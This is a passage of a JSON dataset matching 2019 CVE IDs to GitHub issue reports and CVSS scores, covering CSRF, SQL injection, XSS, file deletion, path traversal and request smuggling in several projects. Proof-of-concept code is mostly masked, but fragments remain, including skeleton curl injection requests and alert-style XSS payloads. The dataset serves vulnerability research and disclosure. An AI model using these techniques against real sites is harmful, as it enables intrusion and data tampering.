  39015. {
  39016. "CVE_ID": "CVE-2019-16677",
  39017. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/76",
  39018. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/76",
  39019. "Repo_new": "idreamsoft/iCMS",
  39020. "Issue_Created_At": "2019-09-02T14:06:28Z",
  39021. "description": "A Sensitive operation CSRF vulnerability exists in iCMS NUMBERTAG Hello, a sensitive CSRF vulnerability was found in the backend administrator-account deletion function. vulnerability url: URLTAG When I omit the CSRF_TOKEN the request still succeeds, so a CSRF vulnerability exists. vulnerability poc: CODETAG When the POC is executed, all administrators except the initial administrator will be deleted\u3002 Hope it can help you.",
  39022. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  39023. "severity": "MEDIUM",
  39024. "baseScore": 6.5,
  39025. "impactScore": 3.6,
  39026. "exploitabilityScore": 2.8
  39027. },
  39028. {
  39029. "CVE_ID": "CVE-2019-16678",
  39030. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/27",
  39031. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/27",
  39032. "Repo_new": "yzmcms/yzmcms",
  39033. "Issue_Created_At": "2019-09-20T08:57:08Z",
  39034. "description": "Denial of service attack caused by CSRF(CSRF\u9020\u6210\u7684\u62d2\u7edd\u670d\u52a1\u653b\u51fb). Hello, I found a vulnerability in your application. I call it a denial of service attack caused by CSRF. The point of vulnerability is the URL rule configuration. When I use CSRF to configure an illegal rule for administrators, the access routing of the whole station will be changed. That is to say, it is totally inaccessible and the site is in ERRORTAG status. APITAG priority is higher than the original admin/et al route). Attacks are shown as follows: No token check is used at the setup route. FILETAG the poc is: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG When the POC is executed, all routes of the site URLTAG are directed to URLTAG And we can define multiple routes in a link, so that all routes are customized and the whole station will crash so that it cannot be accessed. FILETAG FILETAG FILETAG FILETAG In Chinese\uff1a APITAG ERRORTAG \u72b6\u6001\u3002\uff08\u5176\u4f18\u5148\u7ea7\u9ad8\u4e8e\u539f\u672c\u7684admin/\u7b49\u8def\u7531\uff09\u3002 \u653b\u51fb\u5c55\u793a\u5982\u4e0b\uff1a FILETAG the poc is: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u5728\u8bbe\u7f6e\u8def\u7531\u5904\u672a\u4f7f\u7528token\u6821\u9a8c\uff0c APITAG FILETAG FILETAG FILETAG FILETAG",
  39035. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39036. "severity": "MEDIUM",
  39037. "baseScore": 6.5,
  39038. "impactScore": 3.6,
  39039. "exploitabilityScore": 2.8
  39040. },
  39041. {
  39042. "CVE_ID": "CVE-2019-16679",
  39043. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/33",
  39044. "Issue_Url_new": "https://github.com/gilacms/gila/issues/33",
  39045. "Repo_new": "gilacms/gila",
  39046. "Issue_Created_At": "2019-08-04T06:34:40Z",
  39047. "description": "Authenticated Local File Inclusion (LFI) in fm module. Hello Team, When I'm using the application, I observed that the application is vulnerable to an APITAG File Inclusion) vulnerability. Only an authenticated user can perform this exploit remotely. Steps to reproduce the Vulnerability Login into the application as an admin user or equivalent user and go to the link below APITAG FILETAG To fix the Vulnerability If possible, do not permit appending file paths directly. Make them hard coded or selectable from a limited hard coded path list via an index variable. If you definitely need dynamic path concatenation, ensure you only accept required characters such as \"a Z NUMBERTAG and do not allow \"..\" or \"/\" or NUMBERTAG null byte) or any other similar unexpected characters. It is important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure any potential attack cannot perform a directory traversal attack. Tested on Windows NUMBERTAG AMPP version NUMBERTAG Gila CMS Version NUMBERTAG",
  39048. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  39049. "severity": "MEDIUM",
  39050. "baseScore": 4.9,
  39051. "impactScore": 3.6,
  39052. "exploitabilityScore": 1.2
  39053. },
  39054. {
  39055. "CVE_ID": "CVE-2019-16692",
  39056. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2738",
  39057. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2738",
  39058. "Repo_new": "phpipam/phpipam",
  39059. "Issue_Created_At": "2019-09-16T09:18:53Z",
  39060. "description": "Five sql injections on All Phpipam Versions.. Describe the bug Five sql injections on All phpipam APITAG vulnerable files are PATHTAG APITAG version All phpipam Versions. vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure We can find APITAG APITAG info in response content. rsp: APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG APITAG compressed insecure rsp: The time of response is more than NUMBERTAG s. vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure rsp: APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure rsp APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG APITAG Filter saved APITAG % vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG &current NUMBERTAG next NUMBERTAG compressed insecure",
  39061. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39062. "severity": "CRITICAL",
  39063. "baseScore": 9.8,
  39064. "impactScore": 5.9,
  39065. "exploitabilityScore": 3.9
  39066. },
  39067. {
  39068. "CVE_ID": "CVE-2019-16703",
  39069. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/7",
  39070. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/7",
  39071. "Repo_new": "gaozhifeng/phpmywind",
  39072. "Issue_Created_At": "2019-09-04T06:06:50Z",
  39073. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the NUMBERTAG No security check in page PATHTAG FILETAG When I add a new article, I use \" APITAG alert(/xss/) APITAG \" as the title FILETAG then back to the PATHTAG FILETAG the backend page executed a javascript script Fix: Strictly verify user input: you must perform strict checks and HTML escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request, the variables in the HTTP request header, and so on. Verify the data type and verify its format, length, scope, and content. Input must be verified not only on the client side but also on the server side. The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is encoded, the security check should be performed at the output points.",
  39074. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39075. "severity": "MEDIUM",
  39076. "baseScore": 6.1,
  39077. "impactScore": 2.7,
  39078. "exploitabilityScore": 2.8
  39079. },
  39080. {
  39081. "CVE_ID": "CVE-2019-16704",
  39082. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/1",
  39083. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/1",
  39084. "Repo_new": "lolipop1234/xxd",
  39085. "Issue_Created_At": "2019-09-05T09:16:35Z",
  39086. "description": "PHPMYWIND CMS XSS. After logging in to the management page using the ADMIN account, you can insert JAVASCRIPT code in multiple editable places and affect the home page display. Take PATHTAG as an example Step NUMBERTAG open page PATHTAG and log in using an admin account FILETAG Step NUMBERTAG open page PATHTAG FILETAG Step NUMBERTAG Enter APITAG at the title and save FILETAG Step NUMBERTAG refresh FILETAG Javascript code is executed FILETAG The steps for the other vulnerable pages are the same as above, so they are not described one by one. The admin backend of the web application is not protected.",
  39087. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  39088. "severity": "MEDIUM",
  39089. "baseScore": 4.8,
  39090. "impactScore": 2.7,
  39091. "exploitabilityScore": 1.7
  39092. },
  39093. {
  39094. "CVE_ID": "CVE-2019-16705",
  39095. "Issue_Url_old": "https://github.com/libming/libming/issues/178",
  39096. "Issue_Url_new": "https://github.com/libming/libming/issues/178",
  39097. "Repo_new": "libming/libming",
  39098. "Issue_Created_At": "2019-02-28T08:05:46Z",
  39099. "description": "Heap Buffer Overflow (OOB Read) in function APITAG decompile.c NUMBERTAG Description An out-of-bounds read was found in function APITAG (file util/decompile.c NUMBERTAG Details: ERRORTAG poc file URLTAG Credit APITAG of Venustech",
  39100. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  39101. "severity": "CRITICAL",
  39102. "baseScore": 9.1,
  39103. "impactScore": 5.2,
  39104. "exploitabilityScore": 3.9
  39105. },
  39106. {
  39107. "CVE_ID": "CVE-2019-16706",
  39108. "Issue_Url_old": "https://github.com/wangyifani/kkcms/issues/1",
  39109. "Issue_Url_new": "https://github.com/wangyifani/kkcms/issues/1",
  39110. "Repo_new": "wangyifani/kkcms",
  39111. "Issue_Created_At": "2019-10-17T01:47:34Z",
  39112. "description": "search.php has XSS. XSS exists in the homepage search function FILETAG input payload \"> APITAG FILETAG FILETAG",
  39113. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  39114. "severity": "HIGH",
  39115. "baseScore": 8.8,
  39116. "impactScore": 5.9,
  39117. "exploitabilityScore": 2.8
  39118. },
  39119. {
  39120. "CVE_ID": "CVE-2019-16708",
  39121. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1531",
  39122. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1531",
  39123. "Repo_new": "imagemagick/imagemagick",
  39124. "Issue_Created_At": "2019-03-27T08:51:13Z",
  39125. "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description ERRORTAG Steps to Reproduce APITAG then close the windows of APITAG System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  39126. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39127. "severity": "MEDIUM",
  39128. "baseScore": 6.5,
  39129. "impactScore": 3.6,
  39130. "exploitabilityScore": 2.8
  39131. },
  39132. {
  39133. "CVE_ID": "CVE-2019-16710",
  39134. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1528",
  39135. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1528",
  39136. "Repo_new": "imagemagick/imagemagick",
  39137. "Issue_Created_At": "2019-03-25T09:50:16Z",
  39138. "description": "memory leaks. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description memory leaks in APITAG ERRORTAG Steps to Reproduce ./magick composite input1 input2 output.aai System Configuration APITAG ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG NUMBERTAG configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" APITAG version NUMBERTAG APITAG",
  39139. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39140. "severity": "MEDIUM",
  39141. "baseScore": 6.5,
  39142. "impactScore": 3.6,
  39143. "exploitabilityScore": 2.8
  39144. },
  39145. {
  39146. "CVE_ID": "CVE-2019-16711",
  39147. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1542",
  39148. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1542",
  39149. "Repo_new": "imagemagick/imagemagick",
  39150. "Issue_Created_At": "2019-04-11T02:03:07Z",
  39151. "description": "memory leak in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description ERRORTAG Steps to Reproduce PATHTAG composite Memory Leak input1 Memory Leak input2 output.ps2 System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG Additional information: ' ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared' APITAG testcase: FILETAG reporter: APITAG of Venustech",
  39152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39153. "severity": "MEDIUM",
  39154. "baseScore": 6.5,
  39155. "impactScore": 3.6,
  39156. "exploitabilityScore": 2.8
  39157. },
  39158. {
  39159. "CVE_ID": "CVE-2019-16712",
  39160. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1557",
  39161. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1557",
  39162. "Repo_new": "imagemagick/imagemagick",
  39163. "Issue_Created_At": "2019-04-28T04:35:49Z",
  39164. "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG NUMBERTAG ERROR: APITAG detected memory leaks CODETAG Steps to Reproduce APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Mar NUMBERTAG UTC NUMBERTAG APITAG Additional information: ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared testcase:[ FILETAG credit by APITAG of Venustech APITAG",
  39165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39166. "severity": "MEDIUM",
  39167. "baseScore": 6.5,
  39168. "impactScore": 3.6,
  39169. "exploitabilityScore": 2.8
  39170. },
  39171. {
  39172. "CVE_ID": "CVE-2019-16713",
  39173. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1558",
  39174. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1558",
  39175. "Repo_new": "imagemagick/imagemagick",
  39176. "Issue_Created_At": "2019-04-28T04:48:48Z",
  39177. "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ERRORTAG Steps to Reproduce APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Mar NUMBERTAG UTC NUMBERTAG APITAG Additional information: ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared testcase: FILETAG report by APITAG of Venustech APITAG",
  39178. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39179. "severity": "MEDIUM",
  39180. "baseScore": 6.5,
  39181. "impactScore": 3.6,
  39182. "exploitabilityScore": 2.8
  39183. },
  39184. {
  39185. "CVE_ID": "CVE-2019-16723",
  39186. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2964",
  39187. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2964",
  39188. "Repo_new": "cacti/cacti",
  39189. "Issue_Created_At": "2019-09-22T16:37:05Z",
  39190. "description": "Serious security issue allows viewing all graphs. I have created a user with no group membership. Graph permission default is DENY and I have selected all graphs Restricted instead of NUMBERTAG I have device params default DENY and only set to specific one. Template perm is set to DENY. Tree Perms is also default DENY and I set to access only a specific one. When I login with that user I see only one option in tree and when I click on the device I see the graph. Everything is fine. But if I take the url APITAG and change the local_graph_id with another value ie NUMBERTAG I get a response and inside that response I see the image which is base NUMBERTAG If I decode and create png I can see the other graph that I don't have permission to see. I tried to update to latest cacti NUMBERTAG and it still has that security issue. I also checked the source code carefully and I don't see any permission check regarding graphs. For example I see permission check for tree node creation but not for graphs.",
  39191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  39192. "severity": "MEDIUM",
  39193. "baseScore": 4.3,
  39194. "impactScore": 1.4,
  39195. "exploitabilityScore": 2.8
  39196. },
  39197. {
  39198. "CVE_ID": "CVE-2019-16747",
  39199. "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/33",
  39200. "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/33",
  39201. "Repo_new": "matrixssl/matrixssl",
  39202. "Issue_Created_At": "2019-07-25T10:42:31Z",
  39203. "description": "Memory corruption (free on invalid pointer) while parsing DTLS messages. APITAG DTLS server (in versions NUMBERTAG Open and NUMBERTAG Open) incorrectly handles incoming network messages, leading to a memory corruption issue and resulting in a crash of the server. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: matrixssl NUMBERTAG open$ PATHTAG p NUMBERTAG DTLS server running on port NUMBERTAG Select woke NUMBERTAG Sent NUMBERTAG bytes Select woke NUMBERTAG Got REQUEST_RECV from APITAG Select woke NUMBERTAG Error in PATHTAG APITAG invalid pointer NUMBERTAG ae NUMBERTAG Backtrace: ========= PATHTAG NUMBERTAG e5) FILETAG",
  39204. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  39205. "severity": "HIGH",
  39206. "baseScore": 7.5,
  39207. "impactScore": 3.6,
  39208. "exploitabilityScore": 3.9
  39209. },
  39210. {
  39211. "CVE_ID": "CVE-2019-16748",
  39212. "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2459",
  39213. "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2459",
  39214. "Repo_new": "wolfssl/wolfssl",
  39215. "Issue_Created_At": "2019-09-10T10:29:02Z",
  39216. "description": "Heap overread bug in checking cert signature. Hi, another heap over-read bug which could be triggered remotely; tested on APITAG NUMBERTAG ubuntu NUMBERTAG clang /gcc / asan / generate Makefile with ./configure enable lowresource Missing sanity checks before APITAG PATHTAG CODETAG You could trigger it through the following steps NUMBERTAG start the wolfSSL example server program under directory \"examples/server\" by invoking: ./server b p NUMBERTAG start the Python script client_raw.py which sends crafted messages to local port NUMBERTAG FILETAG ASAN report ( if examples/server is compiled with asan ): ERRORTAG",
  39217. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39218. "severity": "CRITICAL",
  39219. "baseScore": 9.8,
  39220. "impactScore": 5.9,
  39221. "exploitabilityScore": 3.9
  39222. },
  39223. {
  39224. "CVE_ID": "CVE-2019-16751",
  39225. "Issue_Url_old": "https://github.com/lynndylanhurley/devise_token_auth/issues/1332",
  39226. "Issue_Url_new": "https://github.com/lynndylanhurley/devise_token_auth/issues/1332",
  39227. "Repo_new": "lynndylanhurley/devise_token_auth",
  39228. "Issue_Created_At": "2019-08-22T15:52:55Z",
  39229. "description": "XSS and Open Redirect. Version : APITAG Routes : APITAG Description : The omniauth failure endpoint is vulnerable to Reflected XSS through the message parameter. Unauthenticated attackers can craft a URL that executes a malicious APITAG payload in the victim\u2019s browser. The same endpoint is also vulnerable to an Open Redirect through the auth_origin_url parameter. Unauthenticated attackers can craft a URL that sends users to a malicious site to phish credentials or launch additional attacks. URLs to reproduce : The following URL should trigger a JS alert with the XSS message. APITAG The following URL should redirect to google. APITAG Reason : The APITAG method and APITAG methods in APITAG are using untrusted input to build the redirect and render the error message. Remediation : Redirect to a pre configured auth_origin_url value and do not trust user input. Use templates that sanitize/escape HTML in rendered params by default or utilize FILETAG to sanitize the message parameter in place.",
  39230. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39231. "severity": "MEDIUM",
  39232. "baseScore": 6.1,
  39233. "impactScore": 2.7,
  39234. "exploitabilityScore": 2.8
  39235. },
  39236. {
  39237. "CVE_ID": "CVE-2019-16867",
  39238. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/12",
  39239. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/12",
  39240. "Repo_new": "neeke/hongcms",
  39241. "Issue_Created_At": "2019-09-23T09:19:45Z",
  39242. "description": "APITAG NUMBERTAG Arbitrary file deletion and reinstall APITAG U need log into manage page and request this page:\u201c URLTAG \u201d. and POST file parameter file= APITAG if u delete FILETAG and view FILETAG , u will reinstall this cms! like this: CODETAG let's view source code: local PATHTAG line NUMBERTAG to line NUMBERTAG ar $action from $_GET[\"action\"] var $filename from $_POST[\"file\"]",
  39243. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  39244. "severity": "MEDIUM",
  39245. "baseScore": 6.5,
  39246. "impactScore": 3.6,
  39247. "exploitabilityScore": 2.8
  39248. },
  39249. {
  39250. "CVE_ID": "CVE-2019-16868",
  39251. "Issue_Url_old": "https://github.com/emlog/emlog/issues/48",
  39252. "Issue_Url_new": "https://github.com/emlog/emlog/issues/48",
  39253. "Repo_new": "emlog/emlog",
  39254. "Issue_Created_At": "2019-09-25T05:43:34Z",
  39255. "description": "emlog has any file deletion vulnerability. vulnerability in FILETAG line NUMBERTAG ERRORTAG post any filepath as \"bak\" , will delete it. Login management background and view APITAG POST bak=anyfile,like FILETAG something. POC: CODETAG",
  39256. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39257. "severity": "CRITICAL",
  39258. "baseScore": 9.8,
  39259. "impactScore": 5.9,
  39260. "exploitabilityScore": 3.9
  39261. },
  39262. {
  39263. "CVE_ID": "CVE-2019-16869",
  39264. "Issue_Url_old": "https://github.com/netty/netty/issues/9571",
  39265. "Issue_Url_new": "https://github.com/netty/netty/issues/9571",
  39266. "Repo_new": "netty/netty",
  39267. "Issue_Created_At": "2019-09-16T17:55:33Z",
  39268. "description": "http request smuggling, caused by obfuscating TE header. Expected behavior ignore obfuscating TE APITAG Encoding : chunked\" vs APITAG Encoding: chunked\") Actual behavior use Transfer Encoding[space] as Transfer Encoding Steps to reproduce NUMBERTAG topology: APITAG NUMBERTAG client send a request with both content length and chunked encoded[space NUMBERTAG elb ignored chunked encoded[space], but use content length NUMBERTAG netty use chunked encoded[space] Minimal yet complete reproducer code (or URL to code) when header field end with space but not colon, should the space be ignored? cannot find proof in URLTAG code in APITAG APITAG APITAG for APITAG = APITAG APITAG APITAG APITAG APITAG ) { break; } } APITAG Netty version all JVM version (e.g. APITAG ) OS version (e.g. ERRORTAG )",
  39269. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  39270. "severity": "HIGH",
  39271. "baseScore": 7.5,
  39272. "impactScore": 3.6,
  39273. "exploitabilityScore": 3.9
  39274. },
  39275. {
  39276. "CVE_ID": "CVE-2019-16884",
  39277. "Issue_Url_old": "https://github.com/opencontainers/runc/issues/2128",
  39278. "Issue_Url_new": "https://github.com/opencontainers/runc/issues/2128",
  39279. "Repo_new": "opencontainers/runc",
  39280. "Issue_Created_At": "2019-09-22T13:15:28Z",
  39281. "description": "APITAG can be bypassed by a malicious image that specifies a volume at /proc. A malicious volume can specify a volume mount on APITAG . Since Docker populates the volume by copying data present in the image, it's possible to build a fake structure that will trick runc into believing it had successfully written to APITAG : URLTAG This is possible because APITAG is executed in the container rootfs, after pivot_root in APITAG URLTAG APITAG is supposed to prevent mounting on top of APITAG : URLTAG ... but the check does not work. I believe the reason is that the dest argument is resolved to an absolute path using APITAG (before pivot_root), unlike the blacklist in APITAG which is relative to the rootfs: URLTAG Minimal proof of concept (on Ubuntu NUMBERTAG ERRORTAG Not a critical bug on its own, but should get a CVE assigned. Discovered by Adam Iwaniuk and disclosed during APITAG CTF ( URLTAG The CTF challenge mounted a file to APITAG and denied access to it using an APITAG policy. The bug could then be used to disable the policy and read the file: URLTAG",
  39282. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  39283. "severity": "HIGH",
  39284. "baseScore": 7.5,
  39285. "impactScore": 3.6,
  39286. "exploitabilityScore": 3.9
  39287. },
  39288. {
  39289. "CVE_ID": "CVE-2019-16890",
  39290. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/311",
  39291. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/311",
  39292. "Repo_new": "halo-dev/halo",
  39293. "Issue_Created_At": "2019-09-25T08:14:17Z",
  39294. "description": "Storage XSS vulnerabilities in article reviews. Enter at the Write Comments Screenshots : FILETAG After the request is successful. View in the background. For the comment list, click jack NUMBERTAG APITAG XSS vulnerability will be launched. APITAG Hackers can steal APITAG APITAG of privileges is APITAG Token Payload CODETAG APITAG APITAG APITAG The reason for the vulnerability is an error in APITAG parameter filtering APITAG CODETAG Ask the author to fix this APITAG",
  39295. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39296. "severity": "MEDIUM",
  39297. "baseScore": 5.4,
  39298. "impactScore": 2.7,
  39299. "exploitabilityScore": 2.3
  39300. },
  39301. {
  39302. "CVE_ID": "CVE-2019-16903",
  39303. "Issue_Url_old": "https://github.com/plutinosoft/Platinum/issues/22",
  39304. "Issue_Url_new": "https://github.com/plutinosoft/platinum/issues/22",
  39305. "Repo_new": "plutinosoft/platinum",
  39306. "Issue_Created_At": "2019-07-22T09:26:54Z",
  39307. "description": "APITAG have APITAG Vulnerability. I audited the code and found a problem\uff0cthe problem code is PATHTAG NUMBERTAG ERRORTAG the function to prevent path traversal is not enough\uff1a APITAG NUMBERTAG in the APITAG line NUMBERTAG the function APITAG CODETAG we know if victim's root directory is\uff1a PATHTAG if an attacker posts a GET request as\uff1a FILETAG the variable \"file_path\" is \".. APITAG and the filter function APITAG could not match \"../\" so cause APITAG Vulnerability we suggest the code as follows: if APITAG NUMBERTAG APITAG NUMBERTAG",
  39308. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  39309. "severity": "MEDIUM",
  39310. "baseScore": 5.3,
  39311. "impactScore": 1.4,
  39312. "exploitabilityScore": 3.9
  39313. },
  39314. {
  39315. "CVE_ID": "CVE-2019-16904",
  39316. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2685",
  39317. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2685",
  39318. "Repo_new": "nilsteampassnet/teampass",
  39319. "Issue_Created_At": "2019-09-25T14:06:24Z",
  39320. "description": "Stored XSS in previous password field. Steps to reproduce NUMBERTAG Add a new item to any folder, set a password with XSS payload: ERRORTAG NUMBERTAG Edit the previous saved item, change the password to any you want NUMBERTAG Reload the page. That's all... we can tap to the item and XSS payload will be executed (because there isn't any filtration in previous used passwords field). Besides, XSS payload will be executed if you try to look at the change history. So we have two places where there isn't any filtration. An attacker can share the item to admin and get admin's cookie for example. FILETAG",
  39321. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39322. "severity": "MEDIUM",
  39323. "baseScore": 5.4,
  39324. "impactScore": 2.7,
  39325. "exploitabilityScore": 2.3
  39326. },
  39327. {
  39328. "CVE_ID": "CVE-2019-16923",
  39329. "Issue_Url_old": "https://github.com/wangyifani/kkcms/issues/2",
  39330. "Issue_Url_new": "https://github.com/wangyifani/kkcms/issues/2",
  39331. "Repo_new": "wangyifani/kkcms",
  39332. "Issue_Created_At": "2019-09-27T08:23:53Z",
  39333. "description": "jx.php url parameter has xss vulnerability. Xss vulnerability payload\uff1aurl=\"> APITAG APITAG alert NUMBERTAG APITAG \" FILETAG",
  39334. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39335. "severity": "MEDIUM",
  39336. "baseScore": 6.1,
  39337. "impactScore": 2.7,
  39338. "exploitabilityScore": 2.8
  39339. },
  39340. {
  39341. "CVE_ID": "CVE-2019-16941",
  39342. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/1090",
  39343. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/1090",
  39344. "Repo_new": "nationalsecurityagency/ghidra",
  39345. "Issue_Created_At": "2019-09-28T13:09:07Z",
